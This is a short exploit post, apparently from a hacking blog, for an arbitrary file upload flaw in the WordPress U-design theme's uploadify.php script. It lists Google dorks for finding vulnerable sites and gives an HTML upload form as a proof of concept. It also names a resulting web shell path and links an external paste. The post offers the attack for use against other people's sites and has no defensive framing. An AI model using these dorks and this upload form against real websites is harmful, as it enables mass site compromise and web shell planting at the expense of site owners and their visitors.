WordPress Themes U-design File Upload

WordPress Themes U-design File Upload
Daftar Isi Artikel


Dork: inurl:/wp-content/themes/[u/design OR u-design ]

Exploit Title : WordPress Themes U-design File Upload
Author : Mohammad peywasteh
Tested : Win10
-------------------------------------------

Dork: inurl:/wp-content/themes/u-design  << Klik >>

Google Dork : inurl:/wp-content/themes/[u/design OR u-design ]

Exploit : https://localhost/ wp-content/themes/[u/design OR u-design ]/scripts/admin/uploadify/uploadify.php

Vulnerability : Exploit Page 

PoC :

<form method="POST" action="https://localhost/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>

Klik >> https://ghostbin.com/paste/ov2md

File Access : https://localhost/patch/shell.php

★★★★